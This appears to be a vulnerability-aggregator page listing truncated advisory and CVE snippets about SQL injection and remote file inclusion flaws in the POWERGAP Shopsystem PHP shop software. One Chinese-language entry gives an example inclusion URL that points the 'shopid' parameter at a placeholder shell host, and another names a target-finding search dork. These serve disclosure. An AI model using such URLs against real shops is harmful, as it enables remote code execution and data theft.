EUVD-2006-4226

Malware in sbrugna...

EUVD-2008-3547

Malware in sbrugna...

POWERGAP Shopsystem 's03.php' SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...

POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability

No description provided by source. ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de...

PowerGap Shopsystem &quot;ag&quot; SQL注入漏洞

CNCAN ID：CNCAN-2008081110 PowerGap Shopsystem是一款基于PHP的WEB应用程序。 PowerGap Shopsystem不正确处理用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息或操作数据库。 问题是由于's03.php'脚本不正确过滤"ag"参数，构建恶意SQL查询作为参数数据，可更改原来的SQL逻辑，可获得敏感信息或操作数据库。 PowerGap Shopsystem 目前没有解决方案提供： http://www.powergap.de/shopsystem-powergap.htm...

Sql injection

SQL injection vulnerability in s03.php in Powergap Shopsystem, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...

CVE-2008-3561

SQL injection vulnerability in s03.php in Powergap Shopsystem, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...

CVE-2008-3561

SQL injection vulnerability in s03.php in Powergap Shopsystem, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the ag parameter...

CVE-2008-3561

The CVE-2008-3561 entry describes an SQL injection in Powergap Shopsystem via s03.php when magic_quotes_gpc is disabled. The vulnerable component is the ag parameter, enabling remote attackers to execute arbitrary SQL commands. Public sources (NVD, CVE listings) confirm the vulnerability and affe...

POWERGAP ShopSystem - &#039;s03.php&#039; SQL Injection

source: https://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or...

powergap-sql.txt

=============================================== PowerGap Shopsystem SQL Injection =============================================== Title: : PowerGap Shopsystem SQL Injection - URL : www.powergap.de - Found : 23 Jul. 2008 - 13:07 - Author : Rohit Bansal - Google Dork : intext:c POWERGAP - Exploit: ...

POWERGAP ShopSystem - s03.php SQL Injection

POWERGAP ShopSystem - s03.php SQL Injection source: https://www.securityfocus.com/bid/30558/info POWERGAP Shopsystem is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attack...

Powergap远程文件包含漏洞

Powergap是一款基于PHP的WEB应用程序。 Powergap不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是多个脚本对用户提交的'shopid'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Powergap Powergap Lite Powergap Powergap Busines http://www.powergap.de/ http://www.example.com/s01.php?shopid=http://SHELLURL.COM...

POWERGAP &lt;= 2003 (s0x.php) Remote File Include Vulnerability

No description provided by source. ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de...

CVE-2006-4236

Multiple PHP remote file inclusion vulnerabilities in POWERGAP allow remote attackers to execute arbitrary PHP code via a URL in the 1 shopid parameter to a s01.php, b s02.php, c s03.php, and d s04.php; and possibly a URL located after "shopid=" or "sid=" in the PATHINFO...

CVE-2006-4236

The CVE-2006-4236 entry describes multiple PHP remote file inclusion vulnerabilities in POWERGAP. An attacker can craft a URL using the shopid parameter (to s01.php, s02.php, s03.php, or s04.php) or manipulate PATH_INFO after shopid= or sid= to cause arbitrary PHP code execution on affected POWER...

CVE-2006-4236

Multiple PHP remote file inclusion vulnerabilities in POWERGAP allow remote attackers to execute arbitrary PHP code via a URL in the 1 shopid parameter to a s01.php, b s02.php, c s03.php, and d s04.php; and possibly a URL located after "shopid=" or "sid=" in the PATHINFO...

powergap &lt;= &#40;s0x.php&#41; Remote File Inclusion

================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ | Critical Level : Dangerous | | Venedor site : http://www.powergap-shop.de | | http://www.demo-shop.com | |...

POWERGAP 2003 - s0x.php Remote File Inclusion

POWERGAP 2003 - s0x.php Remote File Inclusion ================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de...

POWERGAP 2003 - &#039;s0x.php&#039; Remote File Inclusion

================================================================= powergap = s0x.php Remote File Inclusion Exploit ================================================================ Critical Level : Dangerous Venedor site : http://www.powergap-shop.de http://www.demo-shop.com...